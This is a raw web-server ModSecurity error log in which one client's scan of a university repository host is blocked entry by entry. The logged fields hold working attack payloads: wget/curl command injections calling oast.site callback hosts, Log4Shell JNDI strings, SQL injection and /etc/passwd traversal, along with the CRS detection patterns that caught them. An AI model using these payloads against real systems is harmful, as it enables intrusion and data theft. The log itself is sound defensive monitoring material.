[Tue Aug 29 11:31:08.311488 2023] [:error] [pid 900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAOE1kkAAAAC"]
[Tue Aug 29 11:31:09.096156 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgx7e6u8bgwocmq.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQOvzYAAAAw"]
[Tue Aug 29 11:31:10.327222 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQLC-EAAAAt"]
[Tue Aug 29 11:31:10.339298 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgs5ti5hyyker7y.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPPS00AAAAd"]
[Tue Aug 29 11:31:10.407287 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQA-7UAAAAi"]
[Tue Aug 29 11:31:11.329063 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAN@5DAAAAAO"]
[Tue Aug 29 11:31:12.322953 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg7twnnbcwr75i8.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAAOKNu4AAAAK"]
[Tue Aug 29 11:31:13.301563 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg7b7kgp1suwjdj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQTKFwAAAA1"]
[Tue Aug 29 11:31:13.308404 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAQSWKQAAAA0"]
[Tue Aug 29 11:31:14.315597 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10ksCo-f0AAAQJWqwAAAAr"]
[Tue Aug 29 11:31:14.315967 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQTKF4AAAA1"]
[Tue Aug 29 11:31:15.346552 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAQR434AAAAz"]
[Tue Aug 29 11:31:15.351079 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQP65YAAAAx"]
[Tue Aug 29 11:31:16.627473 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQTKGUAAAA1"]
[Tue Aug 29 11:31:17.319671 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAO88AwAAAAF"]
[Tue Aug 29 11:31:17.324336 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQFcQsAAAAn"]
[Tue Aug 29 11:31:17.363956 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAP5mHkAAAAM"]
[Tue Aug 29 11:31:18.331398 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgungs3ghh3hj9m.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAQJWrYAAAAr"]
[Tue Aug 29 11:31:18.529557 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQNwE4AAAAv"]
[Tue Aug 29 11:31:20.396568 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAP7dZcAAAAR"]
[Tue Aug 29 11:31:22.567949 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "repositoryfeb.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQOv00AAAAw"]
[Tue Aug 29 11:31:23.325230 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQA-9IAAAAi"]
[Tue Aug 29 11:31:24.337521 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlg4o1qjoazu57h4.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQOv1IAAAAw"]
[Tue Aug 29 11:31:25.301418 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgjtfee3uzcjp5w.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQNwFoAAAAv"]
[Tue Aug 29 11:31:26.720198 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgadnir3ry1z4as.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQDFTMAAAAl"]
[Tue Aug 29 11:31:27.351193 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAP6NNcAAAAQ"]
[Tue Aug 29 11:31:27.405296 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQOv18AAAAw"]
[Tue Aug 29 11:31:29.211589 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQSWMEAAAA0"]
[Tue Aug 29 11:31:29.502299 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAP6NN8AAAAQ"]
[Tue Aug 29 11:31:29.564857 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAP6NOEAAAAQ"]
[Tue Aug 29 11:31:30.298552 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 